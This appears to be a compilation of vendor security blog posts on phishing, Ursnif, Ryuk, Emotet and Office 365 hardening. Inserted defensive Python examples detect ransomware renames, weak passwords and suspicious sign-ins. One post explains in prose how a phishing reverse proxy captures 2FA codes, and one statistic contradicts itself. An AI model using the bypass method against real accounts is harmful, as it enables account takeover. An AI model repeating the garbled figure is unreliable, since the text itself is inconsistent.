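        print(", ".join(reasons), "<-", cmdline[:60], "...")
        print("  decoded:", decode_encoded_command(cmdline))
```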
Once information has been collected from an infected system, it is packaged inside a CAB file and sent back to the attackers' C2 via encrypted HTTPS. This makes data exfiltration difficult to detect.
The Ursnif Trojan campaign uses email as the attack vector with infection occurring via a Word document attachment that contains a VBA macro. If the attachment is opened and macros are enabled (automatically or manually), the infection process will be triggered.
How Businesses can Protect Against Attacks
Due to the difficulty detecting the malware attack once it has started, the best way to protect against this attack is by improving anti-phishing defenses. It is important to prevent the malicious emails from being delivered to inboxes and to ensure that employees are trained how to identify the messages if they make it past email defenses. The former can be achieved with a powerful spam filtering solution such as SpamTitan.
Combined with security awareness training that conditions employees not to open emails from unknown senders, open unexpected attachments, or enable macros, this allows businesses to mount an effective defense against the attack.
SMB cybersecurity protections do not need to be as advanced as those of large enterprises, but improvements need to be made to ensure smaller businesses are protected. The risk of a cyberattack is not theoretical. While large businesses are having their defenses regularly tested, small to medium sized businesses are also being attacked. And alarmingly often.
Large businesses may store much higher volumes of valuable data, but they also tend to invest heavily in the latest cybersecurity technologies and have dedicated teams to oversee security. Cyberattacks are therefore much harder to pull off. SMBs are much easier targets. Cyberattacks may be less profitable, but they are easier and require less effort.
SMB Cyberattacks are Increasing
A 2017 SCORE study confirmed the extent to which hackers are attacking SMBs. Its study of macro-based malware showed there had been at least 113,000 attacks on SMBs in 2017 and 43% of those attacks were on SMBs. SMBs suffered at least 54,000 ransomware attacks in 2017 and online banking attacks were highly prevalent in the SMB sector.
The 2018 State of Cybersecurity in Small and Medium Size Businesses study, conducted by the Ponemon Institute, painted an even bleaker picture for SMBs. The study suggests SMBs face the same cybersecurity risks as larger businesses and are being attacked almost as often. In its study, 67% of SMB respondents reported having experienced a cyberattack in the past 12 months and 58% had suffered a data breach. Alarmingly, almost half of respondents (47%) said they had little or no understanding about how SMB cyberattacks could be prevented.
The study revealed 60% of successful cyberattacks were the result of employee negligence, hackers were behind 37% of breaches, and for 32% of cyberattacks the cause could not be established.
The high number of successful cyberattacks makes it clear that SMB cybersecurity needs to be improved. Unfortunately, many SMBs simply don’t have the budget to pay for expensive cybersecurity solutions, and a lack of skilled staff is also an issue. So, given these constraints, where should SMBs start?
Where to Start with SMB Cybersecurity
Improving SMB cybersecurity does not necessarily mean hiring skilled cybersecurity staff and spending heavily on state-of-the-art cybersecurity solutions. The best place to start is by ensuring basic cybersecurity best practices are adopted. Highly sophisticated cyberattacks are becoming more common, but many successful attacks are the result of basic cybersecurity failures.
These include the failure to implement password policies that enforce the use of strong passwords, not changing all default passwords, or not using a unique password for each account. Implementing 2-factor authentication is a quick way to improve security, as is the setting of rate limiting to lock accounts after a set number of failed login attempts.
Many successful cyberattacks start with a phishing email. An advanced spam filtering solution is therefore essential. This will ensure virtually all malicious messages are blocked and are not delivered to end users. A web filter also offers protection against phishing by preventing employees from visiting phishing websites. It will also block web-based attacks and malware downloads. Both of these SMB cybersecurity solutions can be implemented at a low cost. It costs just a few dollars per year, per employee, to implement SpamTitan and WebTitan.
A little training goes a long way. Employees should be provided with cybersecurity training and should be taught how to identify email and web-based threats. There are plenty of free and low-cost resources for SMBs to help them train their employees. US-CERT is a good place to start.
Good backup policies are an essential part of SMB cybersecurity. In the event of a cyberattack or ransomware attack, this will prevent catastrophic data loss. A good strategy to adopt is the 3-2-1 approach. Three copies of backups, on two different types of media, with one copy stored securely off-site. Also make sure backups are tested to ensure file recovery is possible.
Once the basics have been covered, it is important to conduct a security audit to discover just how secure your network and systems are. Many managed service providers can assist with security audits and assessments if you do not have sufficiently skilled staff to perform an audit in-house.
Improvements to SMB cybersecurity will carry a cost, but bear in mind that an ounce of prevention is worth a pound of cure: investment in cybersecurity will prove to be much less expensive than having to deal with a successful cyberattack.
2-factor authentication is an important safeguard to prevent unauthorized account access, but does 2-factor authentication stop phishing attacks?
What is 2-Factor Authentication?
2-Factor authentication is commonly used as an additional protection measure to prevent accounts from being accessed by unauthorized individuals in the event that a password is compromised.
If a password is disclosed in a phishing attack or has otherwise been obtained or guessed, a second authentication method is required before the account can be accessed.
Two-factor authentication uses a combination of two different methods of authentication, commonly something a person has (a device, bank card, or token), something a person knows (a password or PIN), and/or something a person is (a fingerprint, iris scan, or voice pattern).
The second factor control is triggered if an individual, authorized or otherwise, attempts to login from an unfamiliar location or from a device that has not previously been used to access the account.
For instance, a person uses their laptop to connect from a known network and enters their password. No second factor is required. The same person uses the same device and password from an unfamiliar location and a second factor must be supplied. If the login credentials are used from an unfamiliar device, by a hacker for instance that has obtained a username and password in a phishing attack, the second factor is also required.
A token or code sent to a mobile phone is often used to verify identity. In such cases, in addition to a password, an attacker would also need to have the user’s phone.
Does 2-Factor Authentication Stop Phishing Attacks?
So, does 2-factor authentication stop phishing attacks from succeeding? In many cases, it does, but 2-factor authentication is not infallible. While it was once thought to be highly effective at stopping unauthorized account access, opinion is now changing. It is certainly an important additional, low-cost layer of security that is worthwhile implementing, but 2-factor authentication alone will not prevent all phishing attacks from succeeding.
There are various methods that can be used to bypass 2-factor authentication. For instance, if a user is directed to a phishing page and enters their credentials, the hacker can use those details in real time to log in to the legitimate site. A 2FA code is sent to the user’s device, the user enters that code into the phishing page, and the attacker then uses the code on the legitimate site.
This 2-factor authentication bypass is somewhat cumbersome, but this week a phishing tool has been released that automates this process. The penetration testing tool was created by a Polish researcher named Piotr Duszynski, and it allows 2FA to be bypassed with ease.
The tool, named Modlishka, is a reverse proxy that has been modified for handling login page traffic. The tool sits between the user and the target website on a phishing domain. When the user connects to the phishing page hosting this tool, the tool serves content from the legitimate site – Gmail for instance – but all traffic passes through the tool and is recorded, including the 2FA code.
The user supplies their credentials, a 2-factor code is sent to their phone, and that code is entered, giving the attacker account access.
It is an automated version of the above bypass that only requires a hacker to have a domain, a valid TLS certificate for the domain, and a copy of the tool. No phishing website templates need to be created as the pages are served from the genuine site. Since the tool has been made available on GitHub, the 2FA bypass could easily be used by hackers.
Additional Controls to Stop Phishing Attacks
To protect against phishing, a variety of methods must be used. First, an advanced spam filter is required to prevent phishing emails from reaching inboxes. SpamTitan, for instance, blocks more than 99.9% of spam and phishing emails.
Fewer than 0.1% of emails may make it past the spam filter, but any one could result in an account compromise. Security awareness training should therefore be provided to employees to help them identify suspicious emails.
Unfortunately, people do make mistakes and phishing emails can be highly realistic, so it is wise to also implement a web filter.
A web filter will block attempts to connect to known phishing sites and can assess sites in real time to help determine their authenticity. If the checks fail, the user will be prevented from accessing the site.
These anti-phishing controls are now essential cybersecurity measures for businesses to protect against phishing attacks, and are all the more important since 2FA cannot be relied upon to protect against unauthorized access once a password has been compromised.
You can find out more about SpamTitan and WebTitan by contacting TitanHQ.
The last weekend of 2018 has seen a major newspaper cyberattack in the United States that has disrupted production of several newspapers produced by Tribune Publishing.
The attacks were malware-related and affected the Saturday editions of the Los Angeles Times, the San Diego Union-Tribune, the Chicago Tribune, the New York Times, the Wall Street Journal, and others. The malware attack occurred on Thursday, December 27, and caused major problems throughout Friday.
All of the affected newspapers shared the same production platform, which was disrupted by the malware infection. While the type of malware used in the attack has not been publicly confirmed, several insiders at the Tribune have reported that the attack involved Ryuk ransomware.
Ransomware is a form of malware that encrypts critical files preventing them from being accessed. The primary goal of attackers is usually to obtain ransom payments in exchange for the keys to decrypt the encrypted files. It is also common for ransomware to be deployed after network access has been gained and sensitive information has been stolen, either to mask a data breach or in an attempt to make an attack even more profitable. It is also not unknown for ransomware attacks to be conducted to cause disruption. It is suspected that this newspaper cyberattack was conducted primarily to disable infrastructure.
The type of ransomware used in an attack is usually easy to identify. After encrypting files, ransomware changes file extensions to an (often) unique extension. In the case of Ryuk ransomware, extensions are changed to .ryk.
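To show how the extension tell described above turns into a detection, here is an added Python example (not part of the article) that runs over a constructed file-server rename log: it looks for appended extensions, matches known ones such as .ryk, and also flags bursts of renames to any new extension so that a family with an unknown extension is still caught. The paths, timestamps and thresholds are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Extension-to-family map. Only .ryk (Ryuk) comes from the article; extend it from
# your own threat intelligence.
KNOWN_EXTENSIONS = {".ryk": "Ryuk"}
# A ransomware run renames many files within seconds; ordinary users do not.
BURST_THRESHOLD = 20
BURST_WINDOW = timedelta(seconds=60)


def appended_extension(old_path, new_path):
    """Return the extension a rename appended (report.docx -> report.docx.ryk), else None."""
    suffix = new_path[len(old_path):]
    if new_path.startswith(old_path) and suffix.startswith("."):
        return suffix.lower()
    return None


def peak_in_window(times, window):
    """Largest number of sorted timestamps that fall inside any interval of length `window`."""
    best, start = 0, 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def detect_renames(events):
    """events: (iso_timestamp, old_path, new_path) tuples. Return a list of findings."""
    by_ext = defaultdict(list)
    for ts, old, new in events:
        ext = appended_extension(old, new)
        if ext:
            by_ext[ext].append((datetime.fromisoformat(ts), new))
    findings = []
    for ext, items in by_ext.items():
        items.sort()
        peak = peak_in_window([t for t, _ in items], BURST_WINDOW)
        family = KNOWN_EXTENSIONS.get(ext)
        # Known extension: flag even a single file. Unknown: only flag a burst.
        if family is None and peak < BURST_THRESHOLD:
            continue
        findings.append({
            "extension": ext,
            "family": family or "unknown (rename burst)",
            "count": len(items),
            "peak_per_window": peak,
            "first_seen": items[0][0].isoformat(),
            "directories": sorted({p.rsplit("\\", 1)[0] for _, p in items}),
        })
    return findings


def constructed_events():
    """Constructed rename log: 25 encryptions of one share plus two benign renames."""
    t0 = datetime(2018, 12, 27, 14, 5, 0)
    events = []
    for i in range(25):
        old = rf"\\fileserver\editorial\story{i:02d}.docx"
        events.append(((t0 + timedelta(seconds=2 * i)).isoformat(), old, old + ".ryk"))
    # Benign: a save-as rename (not an appended suffix) and a single manual .bak copy.
    events.append(("2018-12-27T14:05:10", r"\\fileserver\editorial\draft.tmp",
                   r"\\fileserver\editorial\draft.docx"))
    events.append(("2018-12-27T14:05:12", r"\\fileserver\it\notes.txt",
                   r"\\fileserver\it\notes.txt.bak"))
    return events


if __name__ == "__main__":
    for finding in detect_renames(constructed_events()):
        print(finding)
```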
The Los Angeles Times has attributed it to threat actors based outside the United States, although it is unclear which group was behind the cyberattacks. If the attack was conducted to disable infrastructure it is probable that this was a nation-state sponsored attack.
The first Ryuk ransomware cyberattacks occurred in August. Three U.S. companies were attacked, and the attackers were paid at least $640,000 for the keys to unlock the data. An analysis of the ransomware revealed it shared code with Hermes malware, which had previously been linked to the Lazarus Group – an APT group with links to North Korea.
While many ransomware campaigns use mass spamming tactics to distribute the ransomware and infect as many end users as possible, the Ryuk ransomware attacks were much more targeted and involved considerable reconnaissance and extensive network mapping before the ransomware was finally deployed. As is the case with SamSam ransomware attacks, the campaign is conducted manually.
Several methods are used to gain access to networks, although earlier this year a warning about Ryuk ransomware was issued by the U.S. Department of Health and Human Services claiming email to be one of the main attack vectors, highlighting the importance of email security and end user training to help employees recognize email-based threats.
There are many costs associated with cyberattacks and data breaches, but one of the hardest to quantify is damage to a brand. Brand damage following a data breach is one of the most serious issues, and one that money cannot easily resolve.
Businesses can invest in cybersecurity solutions to prevent further security breaches, but when customers lose trust in a brand, they will simply take their business elsewhere. Winning customers back can be a long process. In many cases, once trust in a brand is lost, customers will leave and never return.
Consumers Expect Businesses to Protect Their Personal Data
If a company asks consumers to provide them with personal data, it is essential that steps are taken to ensure that information remains private and confidential. Consumers believe that any company that collects personal data has an obligation to protect it. A Ponemon Institute study in 2017 confirmed that to be the case. 71% of consumers believed companies that collect personal data have a responsibility to protect it. When a cyberattack occurs that results in the exposure or theft of personal data, consumers are naturally angry at a company for failing to take sufficient precautions to keep their data private.
The same survey revealed that following a data breach, two thirds of consumers lost trust in the breached company and almost a third of consumers said they had terminated their relationship with a brand following a data breach. Companies that were surveyed reported customer churn rates increased up to 7% following a breach. Another study suggests customer loss is more severe and up to 20% of customers have switched brands after their personal information was stolen from a company they did business with. A 2017 study by Gemalto suggests those figures are very conservative. The Gemalto study suggested 70% of customers would switch brands following a data breach.
Loss of Trust in a Brand can have Catastrophic Consequences
Large businesses may be able to weather the storm and regain customer trust over time, but smaller businesses can really struggle. On top of the considerable costs of mitigating a data breach, a loss of anywhere between 20% and 70% of customers would likely be the final nail in the coffin. Loss of customer trust is part of the reason why 60% of SMBs fold within 6 months of a data breach (National Cyber Security Alliance).
Blocking cyberattacks and preventing data breaches requires investment in cybersecurity solutions. Naturally, an advanced firewall is required, and solutions should be introduced to block the most common attack vectors – email for instance – but one area of cybersecurity that is often overlooked is WiFi filtering. WiFi filtering and protecting your brand go hand in hand.
WiFi Filtering and Protecting your Brand
The importance of WiFi Filtering for protecting your brand should not be underestimated. Implementing a web filtering solution shows your customers that you care about security and want to ensure they are protected when they access the Internet through your WiFi network. By implementing a WiFi filter you can prevent customers from downloading malware and ransomware and stop them from connecting to phishing websites.
A WiFi filter can also prevent users from accessing illegal content on your WiFi network. There have been cases of businesses having Internet access terminated by their ISPs over illegal online activity by users – the accessing of banned web content or copyright infringing downloads for instance.
One of the most important uses of a WiFi filter is to prevent users from accessing unacceptable content such as pornography. There is growing pressure on businesses to prevent adult content from being accessed on WiFi networks that are used by customers. McDonald’s decided to implement a WiFi filter in 2016 following campaigns by consumers to make its access points family-friendly, and in 2018 Starbucks was pressured into doing the same. The coffee shop chain will finally start filtering the internet on its WiFi networks in 2019.
A WiFi filter will also prevent employees from visiting malicious websites and downloading malware that gives criminals access to your internal networks and customer data, thus preventing costly, reputation damaging data breaches.
Businesses that fail to block web-based attacks are taking a major risk, and an unnecessary one considering the low cost of WiFi filtering.
Benefits of WebTitan Cloud for WiFi
Benefits of WebTitan Cloud for WiFi include:
Create a family-friendly, safe and secure web browsing environment
Manage access points through a single web-based administration panel
Protect any number of Wi-Fi access points
Filter by website, website category, keyword term, or keyword score
Reduce the risk of phishing attacks
Block malware and ransomware downloads
Inspect encrypted websites with SSL certificates
Schedule and run reports on demand
Gain a real-time view of internet activity
Gain insights into bandwidth use and restrict activities to conserve bandwidth
Integrate the solution into existing billing, auto provisioning and monitoring system through a suite of APIs
Apply time-based filtering controls
Multiple hosting options, including within your own data center
Can be supplied as a white label for MSPs and resellers
World class customer service
Highly competitive pricing and a fully transparent pricing policy
For further information on WiFi Filtering and protecting your brand, contact the TitanHQ team today. Our cybersecurity experts will explain how WebTitan can protect your business and will be happy to schedule a product demonstration and help you set up a free trial of WebTitan to evaluate the solution in your own environment.
A major San Diego School District phishing attack has been discovered. The phishing attack stands out from the many similar phishing attacks on schools due to the extent of accounts that were compromised, the amount of data that was potentially obtained, and the length of time it took for the data breach to be detected.
According to a recent breach announcement, the login credentials of around 50 district employees were obtained by the attacker. It is not unusual for multiple accounts to be breached in school phishing attacks. Once access is gained to one account, it can be used to send internal phishing emails to other staff members. Since those emails come from within, they are more likely to be trusted and less likely to be detected. Investigations into similar phishing attacks often reveal many more email accounts have been compromised than was initially thought, although 50 sets of compromised credentials is particularly high.
Those accounts were compromised over a period of 11 months. The San Diego School District phishing attack was first detected in October 2018 after staff alerted the district’s IT department to phishing emails that had been received. Multiple reports tipped off the IT department that an ongoing cyberattack was occurring and there may have been a data breach.
The investigation revealed the credentials obtained by the attacker provided access to the district’s network services, which included access to the district’s database of staff and student records. The school district is the second largest in California and serves over 121,000 students each year. The database contained records going back to the 2008/2009 school year. In total, the records of more than 500,000 individuals were potentially obtained by the hacker. Given the length of time that the hacker had access to the network, data theft is highly probable.
The data potentially obtained was considerable. Student information compromised included names, addresses, dates of birth, telephone numbers, email addresses, enrollment and attendance information, discipline incident information, health data, legal notices on file, state student ID numbers, emergency contact information, and Social Security numbers. Compromised staff information also included salary information, health benefits data, paychecks and pay advices, tax data, and details of bank accounts used for direct deposits.
Data could be accessed from January 2018 to November 2018. While it is typical for unauthorized access to be immediately blocked upon discovery of a breach, in this case the investigation into the breach was conducted prior to shutting down access. This allowed the identity of the suspected hacker to be determined without tipping off the hacker that the breach had been detected. The investigation into the breach is ongoing, although access has now been blocked and affected individuals have been notified. Additional cybersecurity controls have now been implemented to block future attacks.
School district phishing attacks are commonplace. School districts often lack the resources of large businesses to devote to cybersecurity. Consequently, cyberattacks on school districts are much easier to pull off. Schools also store large volumes of sensitive data of staff and students, which can be used for a wide range of malicious purposes. The relative ease of attacks and a potential big payday for hackers and phishers make schools an attractive target.
The San Diego School District phishing attack is just one of many such attacks that have been reported this year. During tax season at the start of 2018, many school districts were targeted by phishers seeking the W-2 forms of employees. It is a similar story every year, although the threat actors behind these W-2 phishing attacks have been more active in the past two years.
In December this year, Cape Cod Community College suffered a different type of phishing attack. The aim of that attack was to convince staff to make fraudulent wire transfers. At least $800,000 was transferred to the attackers’ accounts in that attack.
These attacks clearly demonstrate the seriousness of the threat of phishing attacks on school districts and highlight the importance of implementing robust cybersecurity protections to protect against phishing.
If you want to improve your defenses against phishing, contact the TitanHQ team today for further information on anti-phishing solutions for schools.
According to a recent Irish phishing study, as many as 185,000 office workers in the country have fallen victim to phishing scams.
Phishing is a method used by cybercriminals to obtain sensitive information such as login credentials, financial information, and other sensitive data. While phishing can take place over the phone, via messaging platforms or by text message, email is most commonly used.
Messages are sent in bulk in the hope that some individuals will respond, or campaigns can be much more targeted. The latter is referred to as spear phishing. With spear phishing attacks, cybercriminals often research their victims and tailor messages to maximize the probability of them eliciting a response.
A successful phishing attack on employees can see them disclose their email credentials which allows their accounts to be accessed. Then the attackers can search emails accounts for sensitive information or use the accounts to conduct further phishing attacks on other employees. When financial information is disclosed, business bank accounts can be emptied.
Businesses can suffer major financial losses as a result of employees responding to phishing emails, the reputation of the business can be damaged, customers can be lost, and there is also a risk of major regulatory fines.
Irish Phishing Study Findings
The Irish phishing study was conducted on 500 Irish office workers by the survey consultancy firm Censuswide. Respondents to the Irish phishing study were asked questions about phishing, whether they had fallen for a phishing scam in the past, and how they rated their ability to identify phishing attacks.
In line with findings from surveys conducted in other countries, 14% of respondents said they had been a victim of a phishing attack. There were also marked differences between age groups. Censuswide analyzed three age groups: millennials, Gen X, and baby boomers. The latter two age groups were fairly resistant to phishing attempts. Gen X were the most phishing-savvy, with just 6% of respondents in the age group admitting to having been fooled by phishing emails in the past, closely followed by the baby boomer generation on 7%. However, 17% of millennials admitted having fallen for a phishing scam – the generation that should, in theory, be the most tech-savvy.
Interestingly, millennials were also the most confident in their ability to recognize phishing attempts. 14% of millennials said they would not be certain that they could detect fraud, compared to 17% of Gen X, and 26% of baby boomers.
It is easy to be confident about one’s ability to spot standard phishing attempts, but phishing attacks are becoming much more sophisticated and very realistic. Complacency can be very dangerous.
Phishing Protection for Businesses
The results of the Irish phishing study make it clear that businesses need to do more to protect themselves from phishing attacks. Naturally, an advanced spam filtering solution is required to ensure that employees do not have their phishing email identification skills put to the test constantly. SpamTitan, for instance, blocks more than 99.9% of spam and phishing emails, thus reducing reliance on employees’ ability to identify scam emails.
The Irish phishing study also highlights the importance of providing security awareness training to employees. The study revealed 44% of the over 54 age group had opened an attachment or clicked on a link in an email from an unknown sender, as had 34% of millennials and 26% of the Gen X age group. Alarmingly, one in five respondents said that their employer had not provided any security awareness training whatsoever.
Employees need to learn how to identify scams, so security awareness training must be provided. Since cybercriminals’ tactics are constantly evolving, training needs to be continuous. Annual or biannual training sessions should be provided, along with shorter refresher training sessions. Businesses should also consider conducting phishing email simulations to test resilience to phishing attacks and highlight weak links.
To be effective, anti-phishing training needs to be provided to all employees and requires buy-in from all departments. Unless that happens, it will be difficult to develop a culture of security awareness.
In this post we offer four simple steps to take to improve Office 365 security and make it harder for hackers and phishers to gain access to users’ accounts.
Hackers are Targeting Office 365 Accounts
It should come as no surprise to hear that hackers are targeting Office 365 accounts. Any software package that has 155 million global users is going to be a target for hackers, and with the number of users growing by an astonishing 3 million a month, Office 365 accounts are likely to be attacked even more frequently.
One study this year has confirmed that to be the case. There has been a 13% increase in attempts to hack into Office 365 email accounts this year, and many of those attacks succeed. You should therefore take steps to improve Office 365 security.
Hackers themselves are paying for Office 365 and are probing its security protections to find vulnerabilities that can be exploited. They also test their phishing emails on real Office 365 accounts to find out which ones bypass Microsoft’s anti-phishing protections.
When emails have been developed that bypass Microsoft’s anti-phishing protections, mass email campaigns are launched on Office 365 users. Businesses using Office 365 can easily be found and targeted because it is made clear that they use Office 365 through public DNS MX records.
So how can you improve Office 365 security and make it harder for hackers? If you take the four steps below, you will be able to greatly improve Office 365 security and thwart more attacks.
Enforce the Use of Strong Passwords
Hackers often conduct brute force attacks on Office 365 email accounts, so you need to develop a strong password policy and prevent users from setting passwords that are easy to brute force. You should not allow dictionary words or any commonly used weak passwords that otherwise meet your password policy requirements – Password1! for instance.
The minimum length for a password should be 8 characters, but consider increasing that minimum. A password of between 12 and 15 characters is recommended. Make sure you do not set too restrictive a maximum number of characters, so as to encourage the use of longer passphrases. Passphrases are harder to crack than 8-character passwords and easier for users to remember. To make it even easier for your users, consider using a password manager.
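An added example (not the article’s or TitanHQ’s code) implementing the password policy described above in Python: a minimum length of 12, a generous maximum so passphrases are not discouraged, and a blocklist check that normalizes away the capital letters, digits and symbols that let Password1! satisfy a naive complexity rule. The weak-word list is a constructed stand-in for a real common-password dictionary.

```python
import re

MIN_LENGTH = 12    # the article suggests 12-15 characters; 8 is the absolute floor
MAX_LENGTH = 128   # keep the cap generous so long passphrases are not discouraged

# Constructed stand-in for a dictionary / breached-password list. In production,
# load a real list; the article's point is that Password1! must be caught by it.
WEAK_BASES = {"password", "welcome", "letmein", "qwerty", "summer", "winter", "admin"}

# Substitutions users apply to a weak base word so that it "meets complexity".
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s", "7": "t",
                      "@": "a", "$": "s"})


def normalize(password):
    """Reduce a password to the base word it decorates: P@ssw0rd2019! -> password."""
    base = password.lower()
    base = re.sub(r"[^a-z]+$", "", base)          # drop trailing years, digits, symbols
    base = re.sub(r"^[^a-z@$0-9]+", "", base)     # drop leading symbols that carry no letter
    return base.translate(LEET)                   # undo leet substitutions


def naive_complexity_ok(password):
    """The classic rule the article warns about: 8+ chars with three of four classes."""
    classes = [re.search(p, password) is not None
               for p in (r"[a-z]", r"[A-Z]", r"[0-9]", r"[^A-Za-z0-9]")]
    return len(password) >= 8 and sum(classes) >= 3


def policy_violations(password, blocklist=WEAK_BASES):
    """Return the reasons a password fails the policy; an empty list means accepted."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append("too_short")
    if len(password) > MAX_LENGTH:
        problems.append("too_long")
    base = normalize(password)
    if base in blocklist:
        problems.append("common_or_dictionary_base:" + base)
    elif any(word in base for word in blocklist if len(word) >= 6):
        problems.append("contains_weak_word")   # e.g. WelcomeToAcme2019!!
    return problems


if __name__ == "__main__":
    for candidate in ("Password1!", "P@ssw0rd2019", "WelcomeToAcme2019!!",
                      "orbit kettle marble tuesday"):
        print(f"{candidate!r}: naive={naive_complexity_ok(candidate)} "
              f"violations={policy_violations(candidate)}")
```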
Implement Multi-Factor Authentication
Even with strong passwords, some users’ passwords may be guessed, or users may respond to phishing emails and disclose their password to a scammer. An additional login control is therefore required to prevent compromised passwords from being used to access Office 365 accounts.
Multi-factor authentication is not infallible, but it will help you improve Office 365 security. With MFA, in addition to a password, another method of authentication is required, such as a token or a code sent to a mobile phone. If a password is obtained by a hacker and an attempt is made to log in from a new location or device, further authentication will be required to access the account.
Enable Mailbox Auditing in Office 365
Mailbox auditing in Office 365 is not turned on by default, so it needs to be enabled. You can set various parameters for logging activity, including successful login attempts and various mailbox activities, which can help you identify whether a mailbox has been compromised. You can also log failed login attempts to help you identify when you are being attacked.
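The following added example (not Microsoft's or TitanHQ's code) shows the kind of triage those records make possible once auditing is on: it reads constructed sign-in records modelled on the unified audit log's UserLoggedIn and UserLoginFailed operations and flags brute-force bursts against one account, password-spray patterns where one source IP fails against many accounts, and successful logins from an IP never seen before for that user. The field names, the export shape and the thresholds are assumptions.

```python
"""Triage of Office 365 sign-in audit records (added example; not Microsoft or TitanHQ code)."""
import json
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Set, Tuple

FAILED_THRESHOLD = 5            # failures by one account inside WINDOW -> brute force
WINDOW = timedelta(minutes=10)
SPRAY_USER_THRESHOLD = 3        # one IP failing against this many accounts -> password spray

# Constructed sample records, one JSON object per line, using the unified audit log field
# names (CreationTime, Operation, UserId, ClientIP) as an assumed export shape.
SAMPLE_LOG = """\
{"CreationTime": "2019-11-04T08:00:01", "Operation": "UserLoginFailed", "UserId": "alice@example.com", "ClientIP": "203.0.113.5"}
{"CreationTime": "2019-11-04T08:00:09", "Operation": "UserLoginFailed", "UserId": "alice@example.com", "ClientIP": "203.0.113.5"}
{"CreationTime": "2019-11-04T08:00:17", "Operation": "UserLoginFailed", "UserId": "alice@example.com", "ClientIP": "203.0.113.5"}
{"CreationTime": "2019-11-04T08:00:25", "Operation": "UserLoginFailed", "UserId": "alice@example.com", "ClientIP": "203.0.113.5"}
{"CreationTime": "2019-11-04T08:00:33", "Operation": "UserLoginFailed", "UserId": "alice@example.com", "ClientIP": "203.0.113.5"}
{"CreationTime": "2019-11-04T08:01:02", "Operation": "UserLoggedIn", "UserId": "alice@example.com", "ClientIP": "203.0.113.5"}
{"CreationTime": "2019-11-04T09:00:00", "Operation": "UserLoginFailed", "UserId": "bob@example.com", "ClientIP": "198.51.100.7"}
{"CreationTime": "2019-11-04T09:00:04", "Operation": "UserLoginFailed", "UserId": "carol@example.com", "ClientIP": "198.51.100.7"}
{"CreationTime": "2019-11-04T09:00:08", "Operation": "UserLoginFailed", "UserId": "dave@example.com", "ClientIP": "198.51.100.7"}
{"CreationTime": "2019-11-04T09:30:00", "Operation": "UserLoggedIn", "UserId": "bob@example.com", "ClientIP": "192.0.2.10"}
"""

# IPs previously seen per user (constructed baseline, e.g. built from the last 30 days of logs).
KNOWN_IPS = {"alice@example.com": {"192.0.2.10"}, "bob@example.com": {"192.0.2.10"}}


def parse_records(text: str) -> List[dict]:
    records = []
    for line in text.strip().splitlines():
        rec = json.loads(line)
        rec["ts"] = datetime.fromisoformat(rec["CreationTime"])
        records.append(rec)
    return sorted(records, key=lambda r: r["ts"])


def find_brute_force(records: List[dict]) -> Set[str]:
    """Accounts with >= FAILED_THRESHOLD failed logins inside any WINDOW-long sliding window."""
    failures: Dict[str, List[datetime]] = defaultdict(list)
    for rec in records:
        if rec["Operation"] == "UserLoginFailed":
            failures[rec["UserId"]].append(rec["ts"])
    flagged = set()
    for user, times in failures.items():      # times are already sorted
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > WINDOW:
                start += 1
            if end - start + 1 >= FAILED_THRESHOLD:
                flagged.add(user)
                break
    return flagged


def find_password_spray(records: List[dict]) -> Set[str]:
    """Source IPs that failed against >= SPRAY_USER_THRESHOLD distinct accounts."""
    users_per_ip: Dict[str, Set[str]] = defaultdict(set)
    for rec in records:
        if rec["Operation"] == "UserLoginFailed":
            users_per_ip[rec["ClientIP"]].add(rec["UserId"])
    return {ip for ip, users in users_per_ip.items() if len(users) >= SPRAY_USER_THRESHOLD}


def find_new_location_logins(records: List[dict], known: Dict[str, Set[str]]) -> List[Tuple[str, str]]:
    """Successful logins from an IP not previously seen for that user (first occurrence only)."""
    seen = {user: set(ips) for user, ips in known.items()}
    alerts = []
    for rec in records:
        if rec["Operation"] == "UserLoggedIn":
            user, ip = rec["UserId"], rec["ClientIP"]
            if ip not in seen.setdefault(user, set()):
                alerts.append((user, ip))
                seen[user].add(ip)
    return alerts


def triage(text: str = SAMPLE_LOG, known: Dict[str, Set[str]] = KNOWN_IPS) -> dict:
    records = parse_records(text)
    return {
        "brute_force_accounts": find_brute_force(records),
        "spray_sources": find_password_spray(records),
        "new_location_logins": find_new_location_logins(records, known),
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print(f"{key}: {value}")
```

In the sample, the brute-force burst against alice is followed a minute later by a successful login from the same address, which is exactly the sequence the new-location check is there to surface; the spray source never succeeds but is visible only because the failures are correlated by IP rather than by account.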
Improve Office 365 Security with a Third-Party Spam Filter
As previously mentioned, hackers can test their phishing emails to find out if they bypass Office 365 anti-phishing controls and your organization can be identified as using Office 365. To improve Office 365 security and reduce the number of phishing emails that are delivered to end users’ inboxes, consider implementing a third-party spam filter rather than relying on Microsoft’s anti-phishing controls. Dedicated email security vendors, such as TitanHQ, offer more effective and more flexible anti-spam and anti-phishing solutions than Microsoft Advanced Threat Protection at a lower cost.
A U.S. school system had Office 365 spam filtering controls in place and other cybersecurity solutions installed, but still experienced a costly 6-week malware infection. In this post we explore what went wrong and how you can improve security in your organization.
Multi-Layered Defenses Breached
If you want to mount a solid defense and prevent hackers from gaining access to your networks and data, multi-layered cybersecurity defenses are required, but for one Georgia school district that was not enough. On paper, their defenses looked sound. Office 365 spam filtering controls had been applied to protect the email system, the school district had a firewall appliance protecting the network, and a web filter had been installed to control what users could do online. Endpoint security had also been installed.
The school district was also updating its desktops to Windows 10 and its servers to Windows Server 2012 or later. Everything looked nice and secure.
However, the transportation department delayed the upgrades. The department was still sharing files on a local Windows 2003 server and some of the desktops were still running Windows XP, even though support for the OS had long since ended. The outdated software and lack of patching was exploited by the attackers.
How Was the Malware Installed?
The investigation has not yet determined exactly how the attack was initiated, but it is believed that it all started with an email. As a result of the actions of an end user, a chain of events was triggered that resulted in a 6-week struggle to mitigate the attack, the cost of which – in terms of time and resources – was considerable.
The attack is believed to have started on a Windows XP machine with SMBv1 enabled. That device had drives mapped to the Windows 2003 server. The malware that was installed was the Emotet Trojan, which used the EternalBlue exploit to spread across the network to other vulnerable devices. The attackers were able to gain control of those devices and installed cryptocurrency mining malware.
